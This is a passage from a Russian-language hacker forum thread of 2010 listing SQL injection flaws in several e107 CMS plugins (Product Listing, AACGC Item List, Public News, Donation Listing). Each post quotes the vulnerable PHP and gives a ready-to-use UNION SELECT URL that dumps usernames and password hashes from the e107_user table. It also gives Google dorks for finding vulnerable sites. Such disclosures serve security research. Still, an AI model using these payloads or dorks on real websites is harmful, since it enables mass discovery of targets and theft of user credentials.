[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"product_listing_subcat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE product_cat=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]ORDER BY product_subcat_name ASC"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);    

while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){

...

[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/product_listing/Product_Sub_Categories.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--

SQL Injection:

/Products.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"product_listing"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE product_cat=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);    

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/product_listing/Products.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--

Путь:

http://e107/e107_plugins/product_listing/Product_Listing_menu.php

http://e107/e107_plugins/product_listing/admin_menu.php

Дорк:inurl:e107_plugins/product_listing/

#88

11.12.2010, 21:35

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Item List V1.4

SQL Injection:

/Item_List.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"det"[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_itemlist_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE item_cat_id=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);    

[/COLOR][COLOR="#0000BB"]$row2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

...

[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_itemlist/Item_List.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--

SQL Injection:

/Item_SubCategories.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"det"[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_itemlist_subcat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE item_subcat_id=[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);       

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_itemlist/Item_SubCategories.php?det.-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4%20from%20e107_user--

Путь:

http://e107/e107_plugins/aacgc_itemlist/admin_menu.php

http://e107/e107_plugins/aacgc_itemlist/Recent_Items_menu.php

http://e107/e107_plugins/aacgc_itemlist/Random_Item_menu.php

Дорк:inurl:e107_plugins/aacgc_itemlist/

#89

12.12.2010, 16:46

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Public News V1.4

SQL Injection:

/News.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_pnews_cat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE news_cat_id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

...

[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_pnews/News.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user--

SQL Injection:

/News_Details.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"aacgc_pnews"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE news_id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8%20from%20e107_user--

Путь:

http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php

http://e107/e107_plugins/aacgc_pnews/pnews_menu.php

http://e107/e107_plugins/aacgc_pnews/pnews_category_menu.php

http://e107/e107_plugins/aacgc_pnews/pnews_archive_menu.php

http://e107/e107_plugins/aacgc_pnews/e_latest.php

http://e107/e107_plugins/aacgc_pnews/counter.php

etc...

Дорк:inurl:e107_plugins/aacgc_pnews/

#90

13.12.2010, 12:53

Unknown

Guest

Сообщений: n/a

Провел на форуме:
34733

Репутация: 83

AACGC Donation Listing V1.7

Необходимы права администратора, SQL Injection:

/admin_edit_donator.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"donation_listing"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"WHERE don_id=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

...

[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/donation_listing/admin_edit_donator.php?edit.-1%20union%20select%201,2,database(),4,5,6

Необходимы права администратора, SQL Injection:

/admin_edit_month.php

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if ([/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$sub_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]];

        unset([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

}

...

if ([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"donation_listing_month"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"month_id, month_name, year"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"month_id =[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"donation_listing_year"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$rows[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql2[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Rows[/COLOR][COLOR="#007700"]();

for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$options[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$option[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'year_name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];}

...[/COLOR][/COLOR]

Пример:

Код:

Code:
http://e107/e107_plugins/donation_listing/admin_edit_month.php?edit.-1%20union%20select%201,database(),3

Путь:

http://e107/e107_plugins/donation_listing/Current_Donations_menu.php

http://e107/e107_plugins/donation_listing/Latest_Donations_menu.php

http://e107/e107_plugins/donation_listing/admin_menu.php

Баги никому не нужные, но всё же..

Страница 9 из 11

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов	it's my	Веб-уязвимости	361	24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ]	[53x]Shadow	Веб-уязвимости	43	04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ]	_kREveDKo_	Веб-уязвимости	20	01.11.2009 14:28
Обзор бесплатных Cms	em00s7	PHP	16	03.07.2009 13:13

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход